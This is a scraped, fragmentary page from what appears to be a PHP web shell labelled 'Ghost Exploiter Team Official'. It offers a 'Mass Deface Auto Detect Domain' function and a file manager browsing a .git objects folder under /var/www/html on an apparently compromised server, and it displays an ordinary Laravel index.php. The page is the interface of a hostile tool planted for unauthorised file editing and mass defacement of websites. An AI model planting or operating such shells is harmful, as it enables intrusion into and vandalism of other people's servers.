Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
.git
/
objects
/
48
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
311b4b8614eeb9a36c05dc5
...
0.814KB
edt
ren
PhpProcess.php
2.438KB
edt
ren
api.php
1.377KB
edt
ren
console.php
0.36KB
edt
ren
default.conf
0.759KB
edt
ren
index.php
0.457KB
edt
ren
services.php
1.011KB
edt
ren
web.php
0.112KB
edt
ren
<?php use Illuminate\Http\Request; define('LARAVEL_START', microtime(true)); // Determine if the application is in maintenance mode... if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) { require $maintenance; } // Register the Composer autoloader... require __DIR__.'/../vendor/autoload.php'; // Bootstrap Laravel and handle the request... (require_once __DIR__.'/../bootstrap/app.php') ->handleRequest(Request::capture());